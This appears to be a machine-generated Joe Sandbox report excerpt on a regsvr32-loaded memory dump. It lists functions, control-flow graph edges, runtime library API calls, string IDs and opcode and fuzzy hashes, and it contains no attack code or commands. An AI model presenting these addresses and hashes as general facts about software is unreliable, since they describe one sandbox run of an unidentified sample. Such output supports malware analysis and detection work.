                                                                                                                                                                                                                                                                                                  control_flow_graph 96 24ed274-24ed283 call 24ed250 99 24ed296-24ed2cb call 24ed1e0 ExitProcess 96->99 100 24ed285-24ed28e 96->100 105 24ed2cd-24ed2d8 99->105 106 24ed317-24ed358 call 24ed43c 99->106 100->99 105->106 112 24ed2da-24ed2e2 105->112 110 24ed35a-24ed364 106->110 111 24ed365-24ed367 call 24ed274 106->111 116 24ed36c-24ed36f 111->116 112->106 114 24ed2e4-24ed2f1 112->114 114->106 115 24ed2f3-24ed2fc 114->115 115->106 117 24ed2fe-24ed305 115->117 117->106 118 24ed307-24ed30e 117->118 118->106 119 24ed310-24ed312 call 24ed1e0 118->119 119->106
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,?,?,?,?,00000004,024ED36C), ref: 024ED29F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                                                                                                                                                                                                                                                                                                  • Instruction ID: d3b5ce37c2283417ef9ae2db9cb35a03cacf932d78e0636fc4e0f3e6db1d0cb4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22312D7090060DCBEF54EFA488846EE77B9FB58306F04463ED41AD7251EB75C584CB91

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 024E6F30 Relevance: 8.1, Strings: 1, Instructions: 6827COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 968 24e6f30-24e7537 969 24e7539-24e753d 968->969 970 24e7543-24e7944 968->970 969->970 971 24e7950-24e795b 969->971 973 24e7946-24e794e 970->973 974 24e7960-24e7f20 970->974 971->970 973->971 973->974 976 24e7f2d-24e7f38 974->976 977 24e7f22-24e7f27 974->977 979 24e7f40-24e7f45 976->979 977->976 978 24ea8f0 977->978 978->978 980 24e7f4b-24e8e1d 979->980 981 24ea8f2-24ea902 979->981 982 24ea2c7-24ea321 980->982 983 24e8e23-24e8e32 980->983 985 24ea39f-24ea3b0 982->985 986 24ea323-24ea332 982->986 983->982 984 24e8e38 983->984 988 24e8e40-24ea2b7 984->988 987 24ea3b2-24ea3db 985->987 989 24ea334-24ea368 986->989 990 24ea382-24ea388 986->990 992 24ea38f-24ea39d 987->992 993 24ea3dd-24ea8d4 987->993 988->982 994 24ea2b9-24ea2c1 988->994 989->987 991 24ea36a-24ea380 989->991 990->992 991->990 992->985 993->979 995 24ea8da-24ea8df 993->995 994->982 994->988 995->979 996 24ea8e5-24ea8ef 995->996 996->978
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: vyTn
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1089316748
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 83b7360607afc321c300968fc2e4c6f4e59b82d3c160ac2c9268e70e23e3c234
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC73925BBB55100BBB0C887A99A33E323C3D3A6729F29B63D85E3C36D3D85E480B5545
                                                                                                                                                                                                                                                                                                  Function 024F98E8 Relevance: 1.8, APIs: 1, Instructions: 321COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _clrfp
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3618594692-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9de0d71a32698c69254166483fc50fffb0cc855f1a24a6c5a74e1e95ab84010b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BB14731510B4D8FDB99CF1CC88AB6677E0FF89318F19859AE959CB262C335D892CB01
                                                                                                                                                                                                                                                                                                  Function 024EA391 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: vyTn
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1089316748
                                                                                                                                                                                                                                                                                                  • Opcode ID: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e0587af37ce7e08b7861c1961ff22cf77f3e75db3784ac7eb17134d30e5b0aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20C1399BBB8A040B6B0C98BA9C973F726C3D3E5709B1DF13D4997D7246ECAD884B1144
                                                                                                                                                                                                                                                                                                  Function 024F2B28 Relevance: .4, Instructions: 365COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 01c0d64119c488a2a7bc4cbbb649606a4a13cf9d0acb045f7f12e45478e663b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBB12A30618F484FDB69DF3C988567E77E2FBC4710F54465FD986C3295DBA098428B82
                                                                                                                                                                                                                                                                                                  Function 024F29A4 Relevance: .3, Instructions: 343COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bfe303e5853c5a77ae8603532c4a43b67a3ff71372ab3af40070a24e057f82d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC91F63061CF4C4FD7A8EF3D984927AB7D2FBC5710F50465FD99AC3251EAA098428B82
                                                                                                                                                                                                                                                                                                  Function 024EDA00 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                                                                                                                                                                                                                                                                                                  • Instruction ID: e7a2b75eb07dbe612bac1303fb9338f0d3115e421c7ac6d29df94913575e8caf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E251E232718E088F9B5CDF6CD49867573D2E7EC311315822EE40AD7265DA70E9468785
                                                                                                                                                                                                                                                                                                  Function 024F6C48 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 499 24f6c48-24f6caf call 24f6070 502 24f6cb5-24f6cb8 499->502 503 24f7110-24f7117 call 24ee49c 499->503 502->503 504 24f6cbe-24f6cc4 502->504 506 24f6cca-24f6cce 504->506 507 24f6d93-24f6da5 504->507 506->507 511 24f6cd4-24f6cdf 506->511 509 24f6dab-24f6daf 507->509 510 24f7060-24f7064 507->510 509->510 512 24f6db5-24f6dc0 509->512 514 24f709d-24f70a7 call 24ee560 510->514 515 24f7066-24f706d 510->515 511->507 513 24f6ce5-24f6cea 511->513 512->510 517 24f6dc6-24f6dcd 512->517 513->507 518 24f6cf0-24f6cfa call 24ee560 513->518 514->503 525 24f70a9-24f70c8 call 24f2430 514->525 515->503 519 24f7073-24f7098 call 24f71ec 515->519 521 24f6dd3-24f6e0e call 24f1334 517->521 522 24f6f91-24f6f9d 517->522 518->525 533 24f6d00-24f6d2b call 24ee560 * 2 call 24f14a8 518->533 519->514 521->522 537 24f6e14-24f6e1e 521->537 522->514 526 24f6fa3-24f6fa7 522->526 530 24f6fa9-24f6fb5 call 24f1468 526->530 531 24f6fb7-24f6fbf 526->531 530->531 544 24f6fd8-24f6fe0 530->544 531->514 536 24f6fc5-24f6fd2 call 24f10d0 531->536 567 24f6d2d-24f6d31 533->567 568 24f6d4b-24f6d55 call 24ee560 533->568 536->514 536->544 541 24f6e22-24f6e54 537->541 546 24f6e5a-24f6e66 541->546 547 24f6f80-24f6f87 541->547 551 24f6fe6-24f6fea 544->551 552 24f70f3-24f710f call 24ee560 * 2 call 24ee300 544->552 546->547 548 24f6e6c-24f6e85 546->548 547->541 550 24f6f8d-24f6f8e 547->550 554 24f6f7d-24f6f7e 548->554 555 24f6e8b-24f6ed0 call 24f1494 * 2 548->555 550->522 557 24f6ffd-24f6ffe 551->557 558 24f6fec-24f6ffb call 24f1468 551->558 552->503 554->547 581 24f6f0e-24f6f14 555->581 582 24f6ed2-24f6ef8 call 24f1494 call 24f6610 555->582 563 24f7000-24f700a call 24f6490 557->563 558->563 563->514 578 24f7010-24f705e call 24f1160 call 24f1230 563->578 567->568 572 24f6d33-24f6d3e 567->572 568->507 584 24f6d57-24f6d77 call 24ee560 * 2 call 24f6490 568->584 572->568 577 24f6d40-24f6d45 572->577 577->503 577->568 578->514 588 24f6f78-24f6f79 581->588 589 24f6f16-24f6f1a 581->589 598 24f6f1f-24f6f73 call 24f7118 582->598 599 24f6efa-24f6f0c 582->599 603 24f6d8e-24f6d8f 584->603 604 24f6d79-24f6d83 call 24f6580 584->604 588->554 589->555 598->588 599->581 599->582 603->507 607 24f70ed-24f70f2 call 24ee300 604->607 608 24f6d89-24f70ec call 24ecd68 call 24f639c call 24f88f8 604->608 607->552 608->607
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 024F6CA4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 024F6070: __GetUnwindTryBlock.LIBCMT ref: 024F60B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 024F6070: __SetUnwindTryBlock.LIBVCRUNTIME ref: 024F60D8
                                                                                                                                                                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024F6D7C
                                                                                                                                                                                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 024F6FCB
                                                                                                                                                                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024F70D7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                  • Opcode ID: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                                                                                                                                                                                                                                                                                                  • Instruction ID: 657e981fe50b2286da78c2f715837a3c7127fc7551b3ba8142dc5105ad97cad6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8E1AF30A18B088FDBA4EF69C4856AAB7E1FF98314F50065FD55AD7315DB34E481CB82
                                                                                                                                                                                                                                                                                                  Function 024F6608 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 997 24f6608-24f6a58 call 24ee464 call 24ee560 1003 24f6a5a-24f6a60 997->1003 1004 24f6a92-24f6a96 997->1004 1003->1004 1007 24f6a62-24f6a64 1003->1007 1005 24f6a9c-24f6aa0 1004->1005 1006 24f6b2a-24f6b2e 1004->1006 1008 24f6aa6-24f6aae 1005->1008 1009 24f6c21 1005->1009 1012 24f6b72-24f6b78 1006->1012 1013 24f6b30-24f6b3c 1006->1013 1010 24f6a76-24f6a78 1007->1010 1011 24f6a66-24f6a6a 1007->1011 1008->1009 1016 24f6ab4-24f6ab8 1008->1016 1021 24f6c26-24f6c40 1009->1021 1010->1004 1020 24f6a7a-24f6a86 1010->1020 1019 24f6a6c-24f6a74 1011->1019 1011->1020 1017 24f6b7a-24f6b7e 1012->1017 1018 24f6be8-24f6c18 1012->1018 1014 24f6b3e-24f6b42 1013->1014 1015 24f6b52-24f6b5e 1013->1015 1014->1015 1023 24f6b44-24f6b50 call 24f1468 1014->1023 1015->1009 1025 24f6b64-24f6b6c 1015->1025 1026 24f6aba-24f6abc 1016->1026 1027 24f6b17-24f6b25 call 24f10fc 1016->1027 1017->1018 1028 24f6b80-24f6b87 1017->1028 1018->1009 1024 24f6c1c call 24f6c48 1018->1024 1019->1004 1019->1010 1020->1004 1022 24f6a88-24f6a8c 1020->1022 1022->1004 1022->1009 1023->1012 1023->1015 1024->1009 1025->1009 1025->1012 1030 24f6abe-24f6ad0 call 24f5de0 1026->1030 1031 24f6af5-24f6af7 1026->1031 1027->1009 1028->1018 1032 24f6b89-24f6b91 1028->1032 1041 24f6c41-24f6c47 call 24ee49c 1030->1041 1044 24f6ad6-24f6ad9 1030->1044 1031->1027 1036 24f6af9-24f6b01 1031->1036 1032->1018 1037 24f6b93-24f6ba6 call 24f1494 1032->1037 1040 24f6b07-24f6b0b 1036->1040 1036->1041 1037->1018 1050 24f6ba8-24f6be6 1037->1050 1040->1041 1045 24f6b11-24f6b15 1040->1045 1044->1041 1048 24f6adf-24f6ae3 1044->1048 1049 24f6ae5-24f6af0 call 24f5ee4 1045->1049 1048->1049 1049->1009 1050->1021
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024F6A38
                                                                                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 024F6B20
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                                  • Opcode ID: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                                                                                                                                                                                                                                                                                                  • Instruction ID: 355f1aea7b79f26529bb4e029fe2b1867ab66d20d8cfcdd3e9798b61cc9aa3e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B461D030618B498FCBA8DF288084326B7E5FBD8315F65865FDAA9C7755DB30D881CB42
                                                                                                                                                                                                                                                                                                  Function 024F6750 Relevance: 6.3, APIs: 4, Instructions: 309COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1111 24f6750-24f677b 1112 24f677d-24f678a call 24f1468 1111->1112 1113 24f678c-24f6790 1111->1113 1115 24f6792-24f6795 1112->1115 1113->1115 1117 24f679b-24f679e 1115->1117 1118 24f6912 1115->1118 1119 24f67b1-24f67b2 1117->1119 1120 24f67a0-24f67af call 24f1468 1117->1120 1121 24f6914-24f692d 1118->1121 1123 24f67b4-24f67b8 1119->1123 1120->1123 1123->1118 1125 24f67be-24f67c1 1123->1125 1126 24f67cb-24f67cd 1125->1126 1127 24f67c3-24f67c5 1125->1127 1128 24f67cf-24f67d7 1126->1128 1129 24f67d9-24f67dc 1126->1129 1127->1118 1127->1126 1128->1129 1130 24f67de-24f67e2 1129->1130 1131 24f6810-24f6813 1129->1131 1130->1131 1132 24f67e4-24f67ee 1130->1132 1133 24f6815-24f682e 1131->1133 1134 24f6830-24f6834 1131->1134 1132->1131 1135 24f67f0-24f67f9 1132->1135 1146 24f686f-24f687b call 24ece40 1133->1146 1137 24f6836-24f685d call 24f9d30 1134->1137 1138 24f6880-24f6884 1134->1138 1149 24f67ff-24f6802 1135->1149 1150 24f692e-24f6970 call 24ee49c * 2 1135->1150 1162 24f690e-24f6910 1137->1162 1163 24f6863-24f6866 1137->1163 1139 24f6886-24f6893 call 24f1494 1138->1139 1140 24f6895-24f6898 1138->1140 1145 24f689a-24f689d 1139->1145 1140->1145 1152 24f689f-24f68d1 call 24ece40 call 24f9d30 1145->1152 1153 24f68d3-24f68e0 1145->1153 1146->1162 1149->1150 1159 24f6808-24f680e 1149->1159 1180 24f6977-24f697c 1150->1180 1181 24f6972-24f6975 1150->1181 1152->1162 1168 24f68f3-24f68f4 1153->1168 1169 24f68e2-24f68f1 call 24f1494 1153->1169 1159->1146 1162->1121 1163->1162 1167 24f686c-24f686d 1163->1167 1167->1146 1174 24f68f6-24f690a 1168->1174 1169->1174 1174->1162 1182 24f697e-24f6986 call 24f6750 1180->1182 1181->1182 1185 24f6988-24f698b 1182->1185 1186 24f69c4-24f69d7 call 24ece40 1182->1186 1188 24f698d-24f69a0 call 24ece40 1185->1188 1189 24f69f4-24f6a09 1185->1189 1192 24f69d9-24f69e3 call 24f1494 1186->1192 1193 24f69e5-24f69f3 call 24f62f4 1186->1193 1197 24f69ae-24f69c2 call 24f6300 1188->1197 1198 24f69a2-24f69ac call 24f1494 1188->1198 1192->1193 1193->1189 1197->1189 1198->1197
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                                                                                                                                                                                                                                                                                                  • Instruction ID: 86769753040310155e8062292c69b6b1ca8c442cfd933ea69fd2cf4647a8d4f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2810730119E1A8FDBADEF6D8050676B3E5FBD8314B66066FC96AC3255DB30D881CB81
                                                                                                                                                                                                                                                                                                  Function 024ECB50 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1205 24ecb50-24ecb96 call 24ee464 1208 24ecb9c-24ecba6 1205->1208 1209 24ecc8d-24ecc94 1205->1209 1210 24ecc79-24ecc7b 1208->1210 1211 24ecd38-24ecd3e 1209->1211 1212 24ecbab-24ecbb9 1210->1212 1213 24ecc81 1210->1213 1214 24ecc99-24ecca7 1211->1214 1215 24ecd44 1211->1215 1216 24ecbbf-24ecbc6 1212->1216 1217 24ecc77 1212->1217 1213->1215 1218 24eccad-24eccb5 1214->1218 1219 24ecd36 1214->1219 1220 24ecd49-24ecd66 1215->1220 1216->1217 1221 24ecbcc-24ecbd1 1216->1221 1217->1210 1218->1219 1222 24eccb7-24eccbb 1218->1222 1219->1211 1221->1217 1223 24ecbd7-24ecbdc 1221->1223 1224 24eccfc-24ecd0d 1222->1224 1225 24eccbd-24eccc2 1222->1225 1226 24ecbde-24ecbf1 1223->1226 1227 24ecbf9-24ecbff 1223->1227 1228 24ecd1f-24ecd33 1224->1228 1229 24ecd0f-24ecd15 1224->1229 1230 24eccf8-24eccfa 1225->1230 1231 24eccc4-24eccd0 1225->1231 1244 24ecc86-24ecc88 1226->1244 1245 24ecbf7 1226->1245 1235 24ecc29-24ecc72 call 24ee430 call 24ee460 1227->1235 1236 24ecc01-24ecc09 1227->1236 1228->1219 1229->1219 1234 24ecd17-24ecd1b 1229->1234 1230->1215 1230->1224 1232 24eccd2-24eccd9 1231->1232 1233 24eccf1-24eccf6 1231->1233 1232->1233 1237 24eccdb-24ecce4 1232->1237 1233->1230 1233->1231 1234->1215 1240 24ecd1d 1234->1240 1235->1217 1236->1235 1241 24ecc0b-24ecc19 call 24ee3b0 1236->1241 1237->1233 1242 24ecce6-24eccef 1237->1242 1240->1219 1241->1235 1249 24ecc1b-24ecc21 1241->1249 1242->1230 1242->1233 1244->1220 1245->1217 1245->1227 1249->1235
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024ECB7B
                                                                                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 024ECC12
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                                                                  • Opcode ID: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 21f65210704287dbfd364e03c5236da98d969685ad8826d8c70d72d2b85a8a15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A61E530208A088BEF28EF5CD4C5A7977D1FB45356B10456FE887C3266EB35E891CB85
                                                                                                                                                                                                                                                                                                  Function 024F71EC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMONLIBRARYCODE
